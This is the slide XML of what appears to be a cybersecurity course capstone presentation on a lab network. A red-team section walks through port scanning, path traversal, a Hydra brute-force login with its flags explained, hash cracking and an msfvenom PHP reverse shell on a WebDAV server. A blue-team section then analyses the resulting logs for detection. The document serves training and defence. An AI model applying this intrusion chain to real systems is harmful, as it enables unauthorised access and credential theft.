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Thin"/>
      <p:regular r:id="rId48"/>
      <p:bold r:id="rId49"/>
      <p:italic r:id="rId50"/>
      <p:boldItalic r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic r:id="rId56"/>
      <p:boldItalic r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId58"/>
      <p:bold r:id="rId59"/>
      <p:italic r:id="rId60"/>
      <p:boldItalic r:id="rId61"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Ligh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937092-1D85-4520-81C4-1C38C2314272}">
  <a:tblStyle styleId="{43937092-1D85-4520-81C4-1C38C23142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Thin-regular.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide41.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-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Light-regular.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-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RobotoLight-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RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><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lastic.co/guide/en/kibana/7.x/alerting-getting-started.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alencynetworks.com/kb/how-to-disable-web-dav-extensions.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://webdav.io/webdav/webdav-resources/webdav-security" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/news/top-ssl-certificates-buyers-guide"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tsparker.com/blog/web-security/understanding-reverse-shell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e2932f9f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e2932f9f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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>If I did not know the subnet, I would have used a tool such as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>tracert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to find the IP address based on the URL.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>An open port is different from a port that is open but filtered.</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Knowing the open ports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>makes it faster and simpler to select or create an attack tool.</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e2932f9f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e2932f9f9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In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>addition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to these folders we can open, and the files we can read inside them, also note at the bottom, it says Port 80. We’ll need that in a minute.</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2932f9f9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2932f9f9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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hmm. “company_folders is in that clickable, indexed list.</a:t>
            </a:r>
            <a:endParaRPr sz="14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2932f9f9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2932f9f9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Let’s see what happens when we click into the company_folders directory, then add “secret”folder” to the URL.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This is the Path Traversal: seeing if you can get to what’s supposed to be secret, by sneaking in through the URL path.</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Oh drat, it’s password protected! Let’s see if we can get that password.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And what a nice hint we get, we know the username is likely to be “ashton”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because the login box that popped up says “The site says, “For ashtons eyes only”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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Which brings us to our next exploit...</a:t>
            </a:r>
            <a:endParaRPr sz="14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A brute force attack is kind of like breaking down the castle wall: if you just keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>hammering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> at it, eventually, usually, it opens. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>In the case of a password, you pound it with as many combinations of words, numbers and letters as possible until you get a match. </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In this case, we don’t have the  “hash” or encrypted form of the password. But we know exactly where on the site this file is. We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>know the username is probably ashton. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>And we even know the port that is open that these files can be accessed through. we can use a tool called HYDRA to try to get the password.</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In our Kali machine, we type the Hydra command. Kali already has Hydra loaded; otherwise we’d have had to add it to our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to use it</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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e2932f9f9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e2932f9f9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oboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>hydra is the tool</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-l tells it we’re trying to logon, and then we give it the logon name we think is ashton</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&lt;ashton&gt;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-P tells it, guess passwords using the wordlist that comes next, which in our case is a popular one called rockyou.txt</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-s 80 tells it what port the service we are using, which is http, is on; we might not have needed it here but we know it, so it can’t hurt.</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-f tells hydra to stop running after the first username- password match it finds.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-vV will show us each combo as Hydra tries them</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Next we have the ip.address where this file is,</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http-get is the protocol that we want hydra to use to ask this web server for something, which is basically, “Is this it? Is this it? Is this it?”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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And finally we give hydra the path/to/secret/directory and then we hit enter and wait…</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Tada! The password is leopoldo.</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e3eac608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e3eac608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So now we can go back to the secret folder and log in.</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And we get another interesting folder called connect_to_corp_server</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk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2932f9f9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e2932f9f9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Inside that connect_to_corp_server folder, is this “Personal Note” telling Ashton how to get to the WebDAV server</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WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> works with http to give users access to various files on the web,</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kind of like sharing a document or folder on Google drive. With this you can share a whole server, and upload, download, make edits to shared files really easily. If you’ve heard of FTP or SAMBA, this is the same kind of thing. It can be really secure. But, so far, these guys don’t seem to be taking their security very seriously, so let’s see what we can do.</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There are some directions for how to get there but first, we have another password to find.</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This file includes a “hash,”or encrypted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>version,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> of Ryan’s password.</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So this is another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> of sensitive data exposure, which causes a whole host of other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</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We’re not going to brute-force this password. We’re going to let the Internet do the work.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk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e2932f9f9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e2932f9f9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We went to a free website called CrackStation, and input that string of characters.</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Here it is! So now we have the CEO’s password.</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To make a long story short, we went back to our Kali attacker machine, and figured out how to follow the instructions in Ashton’s note to himself.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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e2a7d9259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e2a7d925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We went to our File Manager, typed in the IP address,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and sure enough, here we are --two-passwords-deep  into the Capstone company data. Oh and the system even offered to save the password for us.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And speaking of passwords, this file looks interesting! But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>the goal of this exercise is to see if we can find a flag on the main company server, which is a file hidden somewhere so that if we gain access, we can prove it with the contents of that file.</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The Red Team has some more work to do, so I have one more exploitation to talk about.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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e2932f9f9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e2932f9f9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Use a tool in Kali called msfvenom to place a shell onto the Capstone WebDav server.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     LHOST is the attacking computer</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 LPORT is the victim.</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Port 4444 is a default for establishing two-way communication between computers. It was closed, but not blocked. So we are opening it.</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create a reverse-shell which basically means Remember that a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> is what  understands and executes the commands a user enters.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e2932f9f9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e2932f9f9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We use another tool, called msfconsole, to get us in the door so we can access that shell.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>which basically means we can talk back and forth with WebDav.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The go to the web browser and click on the shell.php file to activate it.</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Then go back to Kali and if it worked, you can now navigate the entire Capstone server. If you notice there’s a directory called etc right about the flag.txt file; etc contains files of usernames, passwords, permissions, and lots more that a hacker can change or delete or threaten to delete.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br>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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e2932f9f92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e2932f9f92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Here’s what was in the flag text file. Can you read it?</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Here’s a hint...</a:t>
            </a:r>
            <a:endParaRPr sz="13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Now let’s take a look at how our Blue Team identified the attacks after they took place. Knowing what an attack looks like helps us set up alerts to take quick action if the same pattern starts to happen again.</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600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You’re going see a couple of different dates in these log files. Any test worth its salt has to be repeatable, or it wasn’t much of a test--maybe it was just luck. Our Red Team actually repeated all the exploits three times over the course of a week, and got the same results every time.</a:t>
            </a:r>
            <a:endParaRPr sz="14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e2a7d9259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e2a7d9259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80340" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port scans are a common first step in determining how to attack a target and sometimes will enable someone to judge whether that site or server is going to be worth the amount of effort it will take for the outcome they want. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>It’s a little like walking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>around</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> a house checking for unlocked doors and windows that can offer easy access. This port scan occurred on June 24 at approx. 23:45 (11:45 pm)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-180340" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>About 6,500 packets were sent per second for 3 seconds from the attacking machine, IP 192.168.1.90, for a total of 19,668.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-180340" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This high volume of traffic from 1 IP address within a few seconds is a highly likely indicator of a port scan. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Because of the volume of requests sent in a short time, a port scan can cause a denial of service attack, meaning the server or servers get overloaded and shut down.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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logs showed 16,316 requests to access secret_folder.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All from the IP address of 192.168.1.90</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Took place on June 26, between 2:11:10 to 2:11:55. The requests were from hydra for the password to the folder, and then came the request to login and access it.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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The secret folder had how to get to the WebDAV server, including ryan’s hashed password.</a:t>
            </a:r>
            <a:endParaRPr sz="140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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>In this you see the yellow “Error” message as Hydra tries to get the password to get into the secret folder.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>16,314 errors accessing the password file.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> Previous slide told us there were 16, 316 requests to access the secret_folder, and this one is two less than that, so the attacker had to make 16,314 requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> finding the password.</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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> A search for the word “webdav” with wildcard characters made it easy to find in the logs.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The files requested from the WebDAV directory were the password file, which we just saw on the previous slide,  and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php --which is what we put there.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="6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e2a7d9259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e2a7d9259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There were so many ways the data showed that the reverse-shell connection exploit was in place and working, but I think I’ve already overloaded you with graphs and tables so I’m just going to use my favorite one here.</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First, the destination IP is our attacker machine, and the source IP is the Capstone machine, so that already is concerning that the Capstone server is talking to the attacker. </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Now look at the host.name: from our network map way back at the beginning, we know the Capstone server hostname is either Capstone, or Server-1. But this says Kali! That means, the Kali machine is functioning on the webDAV server.</a:t>
            </a:r>
            <a:endParaRPr sz="14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Nose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
